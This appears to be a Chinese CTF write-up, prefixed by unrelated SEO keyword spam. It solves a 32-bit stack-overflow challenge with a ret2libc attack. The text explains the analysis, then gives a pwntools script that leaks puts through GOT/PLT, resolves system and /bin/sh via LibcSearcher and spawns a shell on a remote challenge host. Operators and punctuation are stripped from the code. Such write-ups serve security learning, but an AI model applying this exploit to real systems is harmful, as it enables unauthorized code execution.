建網(wǎng)站首頁(yè)圖片哪里找,百度助手手機(jī)下載,公司變更登記申請(qǐng)書,免費(fèi)微信商城系統(tǒng)首先checksec檢查保護(hù)機(jī)制#xff1a;-32位程序-開啟了棧不可執(zhí)行機(jī)制然后使用反匯編工具IDA進(jìn)行分析#xff1a;看到了vuln函數(shù)和左邊的win1#xff0c;win2函數(shù)及flag函數(shù)#xff0c;第一眼看到就覺得能夠從這些函數(shù)中獲取flag#xff0c;但實(shí)際行不行呢#xff0c;先一…首先checksec檢查保護(hù)機(jī)制-32位程序-開啟了棧不可執(zhí)行機(jī)制然后使用反匯編工具IDA進(jìn)行分析看到了vuln函數(shù)和左邊的win1win2函數(shù)及flag函數(shù)第一眼看到就覺得能夠從這些函數(shù)中獲取flag但實(shí)際行不行呢先一個(gè)一個(gè)點(diǎn)進(jìn)去看一下vuln函數(shù)內(nèi)部gets函數(shù)可觸發(fā)棧溢出漏洞順便算出偏移為0x18 0x8win1函數(shù)內(nèi)部;使變量win1的值為1win2函數(shù)內(nèi)部一些if-else的條件選擇語(yǔ)句最后是flag函數(shù)內(nèi)部可以發(fā)現(xiàn)要想從這里拿到flag必須要讓win1win2和a1的值都等于-559039827但是前面的那幾個(gè)函數(shù)都無(wú)法實(shí)現(xiàn)所以這幾個(gè)函數(shù)一點(diǎn)作用也沒有純糊弄人呢由于在程序的反匯編代碼中沒有任何后門函數(shù)和system函數(shù)地址題目也沒給libc庫(kù)文件這里考慮泄露出某個(gè)函數(shù)的真實(shí)的地址再借助LibcSearcher這個(gè)插件找到libc庫(kù)再計(jì)算出libc基址進(jìn)而計(jì)算出system函數(shù)及/bin/sh的地址先在IDA中拿到vuln函數(shù)的地址方便后面二次使用棧溢出漏洞0x8048714然后就可以開始編寫exp攻擊腳本了第一次棧溢出先構(gòu)造ROP鏈執(zhí)行puts函數(shù)打印出puts函數(shù)的真實(shí)地址拿到后通過LibcSearcher找到libc庫(kù)然后計(jì)算出libc基址后再計(jì)算出system函數(shù)和/bin/sh地址第二次棧溢出執(zhí)行system函數(shù)后就能拿到shellfrom pwn import * from LibcSearcher import LibcSearcher context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地運(yùn)行程序。 # gdb.attach(io) # 啟動(dòng) GDB io connect(node5.buuoj.cn,29484) # 與在線環(huán)境交互。 offset 0x18 0x4 vuln_addr 0x8048714 elf ELF(./pwn) puts_got elf.got[puts] puts_plt elf.plt[puts] io.recvuntil(bEnter your input ) payload ba*offset p32(puts_plt) p32(vuln_addr) p32(puts_got) io.sendline(payload) puts_addr u32(io.recv(4)) print(hex(puts_addr)) libc LibcSearcher(puts,puts_addr) libc_base puts_addr - libc.dump(puts) system_addr libc_base libc.dump(system) bin_sh_addr libc_base libc.dump(str_bin_sh) io.recvuntil(bEnter your input ) payload ba*offset p32(system_addr) p32(1) p32(bin_sh_addr) io.sendline(payload) io.interactive()這是運(yùn)行結(jié)果這里要手動(dòng)選擇libc庫(kù)32位程序就選擇32位的libc庫(kù)就行可能會(huì)選到不適配得到libc庫(kù)多試幾個(gè)就行了